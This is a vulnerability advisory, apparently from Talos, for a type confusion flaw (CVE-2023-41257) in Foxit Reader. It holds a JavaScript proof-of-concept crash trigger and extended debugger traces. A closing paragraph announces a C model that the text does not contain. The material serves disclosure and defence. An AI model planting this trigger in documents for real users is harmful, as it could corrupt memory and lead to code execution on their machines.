CVE-2023-41257
A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 12.1.3.15356
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a type confusion vulnerability in the way Foxit Reader handles the value property of the Radio Button field. This can be illustrated by the following proof-of-concept code:
function main() {
    app.activeDocs[0].getField('Text Field1')['display'];
    app.activeDocs[0].deletePages();
    // Attach a Calculate action to the txt5 field; it runs whenever a field value changes.
    getField('txt5').setAction("Calculate", 'delete_pages();');
    // Setting the Radio Button value fires the Calculate action registered above.
    app.activeDocs[0].getField('Radio Button0')['value'] = 'a';
}
function delete_pages() {
    // Frees a large number of objects, including the Radio Button field whose value is being set.
    app.activeDocs[0].deletePages();
}
The above code simply assigns a callback function to the Calculate action for the field txt5, which is promptly triggered when the value property of Radio Button0 is set. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing a large number of objects. It also resets the Radio Button object and assigns it to a different object. The exact cause of this behaviour is unknown. Later on, when the Radio Button object is used without its type validation, a type confusion vulnerability occurs. We can observe the following in the debugger (with PageHeap enabled):
0:002> p
Time Travel Position: D46CA:1D56
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b1 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f051:
0258c7b1 ff37 push dword ptr [edi] ds:002b:072fef18=47418ff8
0:002> p
Time Travel Position: D46CA:1D57
eax=072feeb8 ebx=00000001 ecx=a8eb98e0 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b3 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f053:
0258c7b3 8bce mov ecx,esi
0:002> p
Time Travel Position: D46CA:1D58
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b5 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f055:
0258c7b5 c645fc08 mov byte ptr [ebp-4],8 ss:002b:072feed4=00
0:002> dd esi ; <-------------------------------------- [1]
37193830 00000002 00000000 22af8800 37193710
37193840 00000000 22b04918 00000001 00000001
37193850 00000000 00000004 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> ba w4 37193830 ; <-------------------------------------- [2]
0:002> p
Time Travel Position: D46CA:1D59
eax=072feeb8 ebx=00000001 ecx=37193830 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7b9 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff call FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0) ; <---------------- [3]
0:002> u
FoxitPDFReader!safe_vsnprintf+0xf8f059:
0258c7b9 e8220f3cff call FoxitPDFReader!safe_vsnprintf+0x34ff80 (0194d6e0)
0258c7be 8b5de8 mov ebx,dword ptr [ebp-18h]
0258c7c1 85db test ebx,ebx
0258c7c3 7456 je FoxitPDFReader!safe_vsnprintf+0xf8f0bb (0258c81b)
0258c7c5 c7458800000000 mov dword ptr [ebp-78h],0
0258c7cc c7458c00000000 mov dword ptr [ebp-74h],0
0258c7d3 c7459000000000 mov dword ptr [ebp-70h],0
0258c7da 8d45e0 lea eax,[ebp-20h]
0:002> bp 0258c7be
0:002> p
Breakpoint 3 hit
Time Travel Position: D4E44:C2
eax=00003801 ebx=072fe1dc ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe0e8 ebp=072fe0f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06 mov eax,dword ptr [esi] ds:002b:37193000=00000053
0:002> dd 37193830
37193830 371936e0 00000000 22af8800 37193710
37193840 00000000 22b04918 00000000 00000001
37193850 00000000 00000004 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> ba w4 3719383c ; <-------------------------------------- [4]
0:002> g
Breakpoint 3 hit
Time Travel Position: D4E45:C05
eax=37193830 ebx=072fe14c ecx=00000000 edx=00000005 esi=00000010 edi=0000000c
eip=01b27f90 esp=072fe08c ebp=072fe094 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52a830:
01b27f90 66894c780c mov word ptr [eax+edi*2+0Ch],cx ds:002b:37193854=0004
[...]
0:002> g
Breakpoint 6 hit
Time Travel Position: D5347:FC7
eax=0000001f ebx=04614a58 ecx=00000007 edx=62626952 esi=04614a58 edi=3719383c
eip=03eef09b esp=072fe39c ebp=072fe3c0 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d76b:
03eef09b 83c704 add edi,4
0:002> dd 37193830
37193830 00000001 0000001f 0000001f 62626952
37193840 006e0067 00740061 00720075 005f0065
37193850 002e0031 00000000 00000000 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1BB7
eax=37193830 ebx=00000000 ecx=072fe3d0 edx=37193850 esi=00000000 edi=15faafe4
eip=01b29758 esp=072fe39c ebp=072fe3c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x52bff8:
01b29758 8b01 mov eax,dword ptr [ecx] ds:002b:072fe3d0=37193830
0:002> g
Breakpoint 3 hit
Time Travel Position: D5347:1C33
eax=00003801 ebx=00000000 ecx=371936e0 edx=05a23f30 esi=37193000 edi=37193830
eip=01b42a9c esp=072fe328 ebp=072fe330 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x54533c:
01b42a9c 8b06 mov eax,dword ptr [esi] ds:002b:37193000=00000053
0:002> g
Breakpoint 4 hit
Time Travel Position: D5354:6E8
eax=ffffffff ebx=00000001 ecx=a8eb98f8 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7be esp=072fee50 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f05e:
0258c7be 8b5de8 mov ebx,dword ptr [ebp-18h] ss:002b:072feec0=14e46fa8
0:002> dd 37193830 ; <-------------------------------------- [5]
37193830 371936e0 0000001f 0000001f 62626952
37193840 435f6e6f 67657461 5f79726f 74736f50
37193850 6e616353 6974704f 00736e6f 00000000
37193860 00000106 00000000 0000002a 00000000
37193870 00000000 371956e0 00000010 0000000b
37193880 3719b2d4 3719b2c0 0000000a 00000000
37193890 00010106 37193860 00000000 00000000
371938a0 00000000 37195720 00000010 00000002
0:002> da 37193830+c
3719383c "Ribbon_Category_PostScanOptions"
0:002> pc
Time Travel Position: D5354:6F2
eax=072feeb8 ebx=14e46fa8 ecx=072fee60 edx=05a23f30 esi=37193830 edi=072fef18
eip=0258c7e5 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f085:
0258c7e5 e82678feff call FoxitPDFReader!safe_vsnprintf+0xf768b0 (02574010)
0:002> pc
Time Travel Position: D5358:1008
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=0258c7f0 esp=072fee4c ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xf8f090:
0258c7f0 e89bc93bff call FoxitPDFReader!safe_vsnprintf+0x34ba30 (01949190)
0:002> t
Time Travel Position: D5358:1009
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949190 esp=072fee48 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba30:
01949190 55 push ebp
0:002> p
Time Travel Position: D5358:100A
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949191 esp=072fee44 ebp=072feed8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba31:
01949191 8bec mov ebp,esp
0:002> p
Time Travel Position: D5358:100B
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949193 esp=072fee44 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba33:
01949193 ff710c push dword ptr [ecx+0Ch] ds:002b:3719383c=62626952 <-------------------------[6]
0:002> p
Time Travel Position: D5358:100C
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949196 esp=072fee40 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba36:
01949196 ff7508 push dword ptr [ebp+8] ss:002b:072fee4c=072feea4
0:002> p
Time Travel Position: D5358:100D
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01949199 esp=072fee3c ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34ba39:
01949199 e812bdffff call FoxitPDFReader!safe_vsnprintf+0x347750 (01944eb0)
0:002> t
Time Travel Position: D5358:100E
eax=072feea4 ebx=14e46fa8 ecx=37193830 edx=00000000 esi=37193830 edi=072fef18
eip=01944eb0 esp=072fee38 ebp=072fee44 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x347750:
01944eb0 55 push ebp
0:002> pc
Time Travel Position: D5358:1022
eax=62626952 ebx=14e46fa8 ecx=072fedf0 edx=00000000 esi=37193830 edi=072fef18
eip=01944ef1 esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200282
FoxitPDFReader!safe_vsnprintf+0x347791:
01944ef1 e8ca6a1e00 call FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:1039
eax=072fedf0 ebx=14e46fa8 ecx=072fee0c edx=00000004 esi=37193830 edi=072fef18
eip=01944f0f esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477af:
01944f0f e8ac6a1e00 call FoxitPDFReader!safe_vsnprintf+0x52e260 (01b2b9c0)
0:002> pc
Time Travel Position: D5358:104C
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01944f1b esp=072fede0 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x3477bb:
01944f1b e870b7ffff call FoxitPDFReader!safe_vsnprintf+0x342f30 (01940690)
0:002> t
Time Travel Position: D5358:104D
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940690 esp=072feddc ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f30:
01940690 55 push ebp
0:002> t
Time Travel Position: D5358:104E
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940691 esp=072fedd8 ebp=072fee34 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f31:
01940691 8bec mov ebp,esp
0:002> p
Time Travel Position: D5358:104F
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940693 esp=072fedd8 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f33:
01940693 6aff push 0FFFFFFFFh
0:002> p
Time Travel Position: D5358:1050
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=01940695 esp=072fedd4 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f35:
01940695 6829924104 push offset FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x9678f9 (04419229)
0:002> p
Time Travel Position: D5358:1051
eax=072fee0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=0194069a esp=072fedd0 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f3a:
0194069a 64a100000000 mov eax,dword ptr fs:[00000000h] fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:1052
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a0 esp=072fedd0 ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f40:
019406a0 50 push eax
0:002> p
Time Travel Position: D5358:1053
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a1 esp=072fedcc ebp=072fedd8 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200283
FoxitPDFReader!safe_vsnprintf+0x342f41:
019406a1 83ec4c sub esp,4Ch
0:002> p
Time Travel Position: D5358:1054
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a4 esp=072fed80 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f44:
019406a4 53 push ebx
0:002> p
Time Travel Position: D5358:1055
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a5 esp=072fed7c ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f45:
019406a5 56 push esi
0:002> p
Time Travel Position: D5358:1056
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a6 esp=072fed78 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f46:
019406a6 57 push edi
0:002> p
Time Travel Position: D5358:1057
eax=072fee28 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406a7 esp=072fed74 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f47:
019406a7 a1e4149405 mov eax,dword ptr [FoxitPDFReader!fLS::FLAGS_log_backtrace_at+0x110180 (059414e4)] ds:002b:059414e4=afc476d4
0:002> p
Time Travel Position: D5358:1058
eax=afc476d4 ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ac esp=072fed74 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f4c:
019406ac 33c5 xor eax,ebp
0:002> p
Time Travel Position: D5358:1059
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ae esp=072fed74 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4e:
019406ae 50 push eax
0:002> p
Time Travel Position: D5358:105A
eax=a8eb9b0c ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406af esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f4f:
019406af 8d45f4 lea eax,[ebp-0Ch]
0:002> p
Time Travel Position: D5358:105B
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b2 esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f52:
019406b2 64a300000000 mov dword ptr fs:[00000000h],eax fs:0053:00000000=????????
0:002> p
Time Travel Position: D5358:105C
eax=072fedcc ebx=14e46fa8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406b8 esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f58:
019406b8 8bd9 mov ebx,ecx
0:002> p
Time Travel Position: D5358:105D
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=37193830 edi=072fef18
eip=019406ba esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5a:
019406ba 8b33 mov esi,dword ptr [ebx] ds:002b:072fede8=62626952 <---------------- [7]
0:002> p
Time Travel Position: D5358:105E
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406bc esp=072fed70 ebp=072fedd8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!safe_vsnprintf+0x342f5c:
019406bc 85f6 test esi,esi
0:002> p
Time Travel Position: D5358:105F
eax=072fedcc ebx=072fede8 ecx=072fede8 edx=00000004 esi=62626952 edi=072fef18
eip=019406be esp=072fed70 ebp=072fedd8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x342f5e:
019406be 0f84d9010000 je FoxitPDFReader!safe_vsnprintf+0x34313d (0194089d) [br=0]
At [1], we examine the vulnerable field object. The first 4 bytes of the object indicate the type of the field. The Push Button, Radio Button and Check Box fields are indicated by the values 1, 2 and 3 respectively. Here, the vulnerable field object type is the Radio Button. Two breakpoints are set on write access at different offsets of the vulnerable pointer at [2] and [4]. These breakpoints were hit multiple times when the function at [3] was called. At [5], it can be observed that the vulnerable object type is different. Later on, the value at offset 0x0c of the vulnerable object is assigned to the esi register at [6] and [7]. The crash occurs later in the code when the memory pointed to by the esi register is dereferenced. This can be observed in a debugger at the time of the crash:
0:002> g
(11a0.c34): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: D5359:0
eax=00000054 ebx=072fede8 ecx=00000054 edx=00000000 esi=62626962 edi=072fed90
eip=01b366d2 esp=072fed14 ebp=072fed1c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608 div eax,dword ptr [esi+8] ds:002b:6262696a=????????
0:002> u
FoxitPDFReader!safe_vsnprintf+0x538f72:
01b366d2 f77608 div eax,dword ptr [esi+8]
01b366d5 8b450c mov eax,dword ptr [ebp+0Ch]
01b366d8 8910 mov dword ptr [eax],edx
01b366da 8b7604 mov esi,dword ptr [esi+4]
01b366dd 85f6 test esi,esi
01b366df 7422 je FoxitPDFReader!safe_vsnprintf+0x538fa3 (01b36703)
01b366e1 8b3496 mov esi,dword ptr [esi+edx*4]
01b366e4 85f6 test esi,esi
0:002> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fed1c 01b36cd0 072fed90 072fed2c 62626962 FoxitPDFReader!safe_vsnprintf+0x538f72
01 072fed30 01801f2a 072fed90 072fed48 a8eb9b8c FoxitPDFReader!safe_vsnprintf+0x539570
02 072fed58 0194073f 072fedc8 072fed90 00000000 FoxitPDFReader!safe_vsnprintf+0x2047ca
03 072fedd8 01944f20 a8eb98e0 37193830 62626952 FoxitPDFReader!safe_vsnprintf+0x342fdf
04 072fee34 0194919e 072feea4 62626952 072feed8 FoxitPDFReader!safe_vsnprintf+0x3477c0
05 072fee44 0258c7f5 072feea4 a8eb980c 13304f40 FoxitPDFReader!safe_vsnprintf+0x34ba3e
06 072feed8 0257767a 2c256ff8 072fef00 ffffffff FoxitPDFReader!safe_vsnprintf+0xf8f095
07 072fef38 02597097 024b2110 072fef7c 072fef64 FoxitPDFReader!safe_vsnprintf+0xf79f1a
08 072fef6c 0256a8b1 48d6cff8 072fef94 0eebf8e0 FoxitPDFReader!safe_vsnprintf+0xf99937
09 072fefc0 02833022 3ddf4ff8 072fefe4 48d6cff8 FoxitPDFReader!safe_vsnprintf+0xf6d151
0a 072feffc 0289d8b0 072ff488 072ff498 4b8aa600 FoxitPDFReader!FXJSE_GetClass+0x552
0b 072ff064 028b30a4 072ff0cc 3dfb3068 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x6a4a0
0c 072ff118 028b2df4 072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7fc94
0d 072ff15c 028b3696 072ff264 072ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f9e4
0e 072ff268 028b2d84 072ff2d8 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x80286
0f 072ff2b0 028b2acc 072ff2d8 072f0001 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f974
10 072ff2dc 02cfcff2 072ff39c 012ff33c 072ff498 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7f6bc
11 072ff3c0 02cf72b0 072ff44c 072ff48c 072ff488 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c9be2
12 072ff460 02c38c3b 00000005 072ff498 4b8aa600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c3ea0
13 072ff480 02cb0bea 538856a1 52c3172d 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40582b
14 072ff4bc 02bd4d79 5395209d 539520b9 52c31511 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x47d7da
15 072ff4e8 02bd4d79 538feb6d 53951ec1 53882339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
16 072ff510 02bd3400 538feb6d 538821b1 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
17 072ff528 02bd3229 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
18 072ff554 0286f59e 4b8aa600 53882339 53952031 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
19 072ff664 0286f0b2 072ff7f8 4b8aa600 072ff6c0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
1a 072ff6ec 02857da4 072ff7f8 4b8aa600 3dfb3024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
1b 072ff89c 028578a0 072ff938 3dfb3040 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
1c 072ff8b0 028312af 072ff938 3dfb3040 a8eb8ffc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
1d 072ff928 02831be6 3dfb3024 181ecff8 3dfb3010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
1e 072ff964 024af2f4 4d2b0fd8 3ff79c8c 181ecff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1f 072ff9c8 024b01e0 00000000 072ffa40 072ffa0c FoxitPDFReader!safe_vsnprintf+0xeb1b94
20 072ff9dc 02600775 072ffa40 072ffa0c a8eb8cd0 FoxitPDFReader!safe_vsnprintf+0xeb2a80
21 072ffa04 02600879 00000000 072ffa40 a8eb8cec FoxitPDFReader!safe_vsnprintf+0x1003015
22 072ffa38 024b2360 371b7020 00000113 072ffa5c FoxitPDFReader!safe_vsnprintf+0x1003119
23 072ffa48 00bf7e97 00000113 00007ee6 16fc9251 FoxitPDFReader!safe_vsnprintf+0xeb4c00
24 072ffa5c 769223b3 00000000 00000113 00007ee6 FoxitPDFReader!CryptUIWizExport+0x28147
25 072ffa88 7690ca55 00bf7e80 00000000 00000113 USER32!_InternalCallWinProc+0x2b
26 072ffb58 769117b4 00bf7e80 00000000 00000113 USER32!UserCallWinProc+0x143
27 072ffbcc 769115c0 00000113 072ffbf4 0055d3c4 USER32!DispatchMessageWorker+0x1e4
28 072ffbd8 0055d3c4 0f042ec8 0f042ec8 05ae3738 USER32!DispatchMessageW+0x10
29 072ffbf4 0055d483 05ae3738 0055d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
2a 072ffc14 040a021e 00000000 05b0fab4 071fb000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
2b 072ffc2c 03e65f48 00140000 00000000 09cac308 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
2c 072ffc78 75de7d59 071fb000 75de7d40 072ffce0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
2d 072ffc88 771ab79b 071fb000 43a1b297 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 072ffce0 771ab71f ffffffff 771d89db 00000000 ntdll!__RtlUserThreadStart+0x2b
2f 072ffcf0 00000000 03e66017 071fb000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the crash occurs when esi is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to gain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution. Additionally, it should be noted that this vulnerability is very similar to a previously reported type confusion vulnerability that was tracked as CVE-2023-32664 and TALOS-2023-1795.
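The bug shape described above (a type tag checked once, a script callback that tears the field down and lets its memory be reused, and a pointer cached before the callback used afterwards) next to the corresponding hardening, as an added C model that is not Foxit code. The struct layouts, the Document/find_field lookup, the Options.n_choices divisor and the callback signatures are all assumptions standing in for the real object layout; only the type tag values 1/2/3 and the string seen at [5] come from the advisory.

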